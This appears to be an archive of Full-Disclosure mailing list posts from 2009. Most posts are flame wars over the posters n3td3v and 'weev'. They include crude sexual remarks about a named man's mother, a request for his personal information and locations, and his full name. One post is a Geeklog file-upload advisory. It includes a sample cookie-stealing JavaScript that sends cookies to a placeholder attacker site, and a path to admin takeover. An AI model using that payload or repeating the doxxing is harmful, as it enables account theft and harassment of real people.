Re: [Full-disclosure] n3td3v the new age martyr of the full-disclosure mailing list
http://www.youtube.com/watch?v=apEuFdzP5ZU This will not stand. The Information Security community has absolutely no tolerance for censorship. - AntiSec On Fri, 02 Oct 2009 22:16:27 + full-censors...@hushmail.com wrote: we're making n3td3v a martyr of the full-disclosure mailing list. join hands in a circle and ban the other trolls in the name of our martyr. three cheers for our martyr!!! ban the trolls, ban the trolls, ban the trolls!!! vulcanius vulcan...@gmail.com wrote: Who is we? Weren't you calling for n3td3v to be allowed back not long ago? Do you see the irony in your message? I know how you can get at least one troll off the list, unsubscribe. full-censors...@hushmail.com wrote: THE FULL-CENSORSHIP MOVEMENT OUR GOALS * we are a movement of security professionals who will complain about every troll * we believe anybody who offends us should be banned * we will not stop until every troll is banned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] So weev...
Hello, I think there is a good chance we can get Andrew into prison for his criminal activity. Weev's affect hasn't just harassed innocents, but also came to the dismay of his former associates, who casted suspicion on due to his poor choices. If you have been victimized by Weev and no legal efforts or requests have worked, please submit any evidence you have to http://tips.fbi.gov. Also, if you have any personal information that is of any value including: - his secrets - personality - pictures - locations - methods of alluding law enforcement - et cetera please mail them to me personally (or on this list). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] So weev...
This is about fighting crime. Not about putting your stuff into the alleged suspect's mother. Please have some sense of courtesy and professionalism. *ISRAEL* Internet Sleuth, Richard Anderson, Electronic Lawyer Original Message From: BMF badmotherfs...@gmail.com To: GOBBLES gobbles1...@safe-mail.net Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] So weev... Date: Fri, 2 Oct 2009 17:08:40 -0700 On Fri, Oct 2, 2009 at 4:57 PM, GOBBLES gobbles1...@safe-mail.net wrote: There is a strong likelihood chance we can get Andrew into prison for his criminal activity. Sweet! I love to send people to Federal Pound me in the ass Prison! While Bubba is fudgin' this weev character I can be fudgin' his momma! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] So weev...
On Fri, Oct 2, 2009 at 4:57 PM, GOBBLES gobbles1...@safe-mail.net wrote: There is a strong likelihood chance we can get Andrew into prison for his criminal activity. Sweet! I love to send people to Federal Pound me in the ass Prison! While Bubba is fudgin' this weev character I can be fudgin' his momma! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] So weev...
On Fri, Oct 2, 2009 at 5:14 PM, GOBBLES gobbles1...@safe-mail.net wrote: This is about fighting crime. Not about putting your stuff into the alleged suspect's mother. Please have some sense of courtesy and professionalism. Bwahahahha...someone who posts other peoples dirty laundry and pics of his family and goes by the name GOBBLES (as in gobbles knobs) is lecturing ME on courtesy and professionalism? You don't care one wit about crime or professionalism. Now if you'll excuse me I gotta go beat off to this pic of his momma you posted...say, got any pics of your momma? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] So weev...
On Fri, Oct 2, 2009 at 5:14 PM, GOBBLES gobbles1...@safe-mail.net wrote: Not about putting your stuff into the alleged suspect's mother. Also: Isn't it way late to start using words like alleged? You have already definitively stated that he has done the deeds. What's the point? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] So weev...
I don't see how mirroring information about weev -- that was already posted by someone else -- signifies I don't care about crime. I believe you're being a relativist. I feel your miffed I care too much about justice and not enough about your sociopathic troll persona. Have a warm cup of soothing tea (cognitive dissonance is a bitch), and listen, because I'm going to help you: Now if you really wish, we can get you two on a date. However, you have to shape up that attitude, she looks like a real wholesome woman who wouldn't be impressed by latest emails. They are lurid! She is a woman who no doubt wants a smart man who works hard. I'm sure she loves her husband! TheiProphet said that her mom wanted an intellectual friend, not a kid. And that his dead was totally absent You have a chance of getting with Andrew Auernheimer's (AKA Weev's) mom, Cathy, however you need to lighten up that nihilistic troll rhetoric. I need you to rent a tuxedo, get on SILC, and we'll start greasing the wheels. We got success ahead! And remember, n3td3v is True Intelligence in an Open world. Original Message From: BMF badmotherfs...@gmail.com To: GOBBLES gobbles1...@safe-mail.net Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] So weev... Date: Fri, 2 Oct 2009 17:19:14 -0700 On Fri, Oct 2, 2009 at 5:14 PM, GOBBLES gobbles1...@safe- mail.net wrote: This is about fighting crime. Not about putting your stuff into the alleged suspect's mother. Please have some sense of courtesy and professionalism. Bwahahahha...someone who posts other peoples dirty laundry and pics of his family and goes by the name GOBBLES (as in gobbles knobs) is lecturing ME on courtesy and professionalism? You don't care one wit about crime or professionalism. Now if you'll excuse me I gotta go beat off to this pic of his momma you posted...say, got any pics of your momma? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] So weev...
My emails are not to be read hypercritically. Rather, you should get the point as whole. http://tips.fbi.gov = Are you an 'alleged' victim of weev (Now disclosed to be known as Andrew Auernheimer)? Help want to change this, and to do that, we need you to report your experiences to the federal bureau of investigation. Thank you. On Sat, 03 Oct 2009 00:22:51 + BMF badmotherfs...@gmail.com wrote: On Fri, Oct 2, 2009 at 5:14 PM, GOBBLES gobbles1...@safe- mail.net wrote: Not about putting your stuff into the alleged suspect's mother. Also: Isn't it way late to start using words like alleged? You have already definitively stated that he has done the deeds. What's the point? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] So weev...
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 (Now disclosed to be known as Andrew Auernheimer)? Help want ... We interrupt momentarily to notify you that his name is Andrew Alan Escher Auernheimer. Kind of a funky set of middle names. We are envious. WINTERMUTE -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkrGq+8ACgkQAN7xmh8YPB0O/QP/T3j7eLraLZ/25JCR4mZEjOMbmXbU nbnYVxBtxDIl8dWg61hcx2jhAmSPL+w63rlzOqFGbhw08qqLWiE54tMMqwKLYS11OzEI YpPUFB5oCbMCpAOG6TC0n+8niU66fsiwaMBApUIKalbTlrlVLqqQvf+YgeKltG0MMfUB NPhLSis= =LSvk -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] So weev...
I wouldn't be too concerned if I was weev. A guy who uses phrases like *alleged suspect* and* likelihood chance* is after him! Oh dear, he must be going to accuse weev of being an *illegal criminal*! 2009/10/3 GOBBLES gobbles1...@safe-mail.net This is about fighting crime. Not about putting your stuff into the alleged suspect's mother. Please have some sense of courtesy and professionalism. *ISRAEL* Internet Sleuth, Richard Anderson, Electronic Lawyer Original Message From: BMF badmotherfs...@gmail.com To: GOBBLES gobbles1...@safe-mail.net Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] So weev... Date: Fri, 2 Oct 2009 17:08:40 -0700 On Fri, Oct 2, 2009 at 4:57 PM, GOBBLES gobbles1...@safe-mail.net wrote: There is a strong likelihood chance we can get Andrew into prison for his criminal activity. Sweet! I love to send people to Federal Pound me in the ass Prison! While Bubba is fudgin' this weev character I can be fudgin' his momma! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] So weev...
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 We are not convinced; weev seems to have been concerned with net- IRL identity mapping in the past: seriously. we need a sysop faq that is sure to state that the only person we are allowed to mention when talking about ED ownership is joseph evers. -- weev, 20080531, correspondence yes please scrub realnames from ED -- weev, 20080531, correspondence We have reason to believe Andrew Alan Escher Auernheimer has done some things he would rather others did not know about. We will keep you posted. WINTERMUTE On Fri, 02 Oct 2009 20:43:02 -0500 dramacrat yirim...@gmail.com wrote: I wouldn't be too concerned if I was weev. A guy who uses phrases like *alleged suspect* and* likelihood chance* is after him! Oh dear, he must be going to accuse weev of being an *illegal criminal*! -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkrGrvwACgkQAN7xmh8YPB1kpAQAg0zlbaEQUwN26mkyCnVLkCHD3Dxa ACdXyKJ4Z/CiXaUs2vYfGUY3O1SgryygzRIN/pJTxr2ofejUkuGAr9MU1K+ayxEr00ir vbCnHRRkyjjZtLjMn9XsSdkuyKHXJCCc9vIUIXYxYo0jtoApvVVZkw00QFCe3FwEyJIY mNIfGHg= =E68p -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Geeklog = v1.6.0sr2 - Remote File Upload
==
Geeklog = v1.6.0sr2 - Remote File Upload
Discovered: JaL0h
Software Site: http://www.geeklog.net
Dork: By Geeklog Created this page in +seconds +powered
==
Remote File Upload
==
Geeklog has several options to upload images. The image upload process does
not validate the mime type of the upload. Geeklog trusts the mime type
specified by the browser and also checks the file extension, both of which
are very easy to spoof.
Files with .jpg extensions can be uploaded, but these file can contain
anything, like javascript or PHP code. Using FireFox you can upload any
jpg extension and it will be accepted since FireFox sets the mime type
based on file extension.
Uploading usually requires that you first create a user account. Once an
account is created, you can upload a user photo, which could take advantage
of this vulnerability.
Potential Abuse
===
Executable javascript can easily be uploaded. There are several XSS holes in
many of the Geeklog plugins which could run the uploaded javascript. If a simple
cookie stealing javascript were uploaded, it could be used to expose the Geeklog
uid and password hash which is as good as having the actual password.
Sample JavaScript
document.write('iframe src=http://my.cookiestealingsite.com/cs.php?ck='
+ document.cookie + ' id=myFrame frameborder=0 vspace=0
hspace=0 marginwidth=0 marginheight=0 width=0 scrolling=no
height=0 style=visibility:hidden;/iframe');
Once the uid and password hash is known, you can set a cookie in your browser:
geeklog=[uid]; password=[md5 hash];
which gives you instant access to everything the user has access to. If you
expose an administrative account, you have full access to the admin panel
where you can set the staticpages.PHP permission to true, then create a
static page that will run any PHP script you desire, potentially exposing
the entire server.
The cookie exploit was originally documented by Nine:Situations:Group::bookoo
http://www.milw0rm.com/exploits/8376 and remains unfixed.
Successful exploitation requires the ability to execute the uploaded JavaScript.
The Geeklog Forum program can be used as an attack vector since it does not
properly validate many $_GET / $_POST variables.
_
Windows Live: Make it easier for your friends to see what you’re up to on
Facebook.
http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_2:092009___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v the new age martyr of the full-disclosure mailing list
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 full-censors...@hushmail.com wrote: we're making n3td3v a martyr of the full-disclosure mailing list. join hands in a circle and ban the other trolls in the name of our martyr. three cheers for our martyr!!! ban the trolls, ban the trolls, ban the trolls!!! vulcanius vulcan...@gmail.com wrote: Who is we? Weren't you calling for n3td3v to be allowed back not long ago? Do you see the irony in your message? I know how you can get at least one troll off the list, unsubscribe. full-censors...@hushmail.com wrote: THE FULL-CENSORSHIP MOVEMENT OUR GOALS * we are a movement of security professionals who will complain about every troll * we believe anybody who offends us should be banned * we will not stop until every troll is banned ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I'm so fed up with the crap on here, I'm gone. Talk all the shit you want, I want see it, thank god! -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBSsbdoaSvjvL7s/z0AQLC7wgAkrQDhFa9ZZNsPsoLJ78eKnE5VXDp2cMG HkNuki+2suV7frIjJ9n4NLT5aLvC7i10aMdneXchYHrhA5QyKJeCo6HP+SYxyWhP 8/dINps0+4AGlCk5B/RWZdEjwrAT1RDBgZdCSUks9jte6nPV+11zcFoDtEDfnJo/ i5NoP0qzrqREJxDhRS8Q3fR1Ra6WIZXjgvMsgO6Pqtaw70c/a+Wc+U0bySJynlYn mBrfjoU+nFA9KS+yRKPMrtBBK/PjteQhCVnmwdEjmfeFfH85tF/RIMlIjCcVcv2t GVt1o9F0128sgoWKoslrgBnxgDaXyiLDgfZhlcRNlGpb6G0vmwGkcA== =X7bx -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
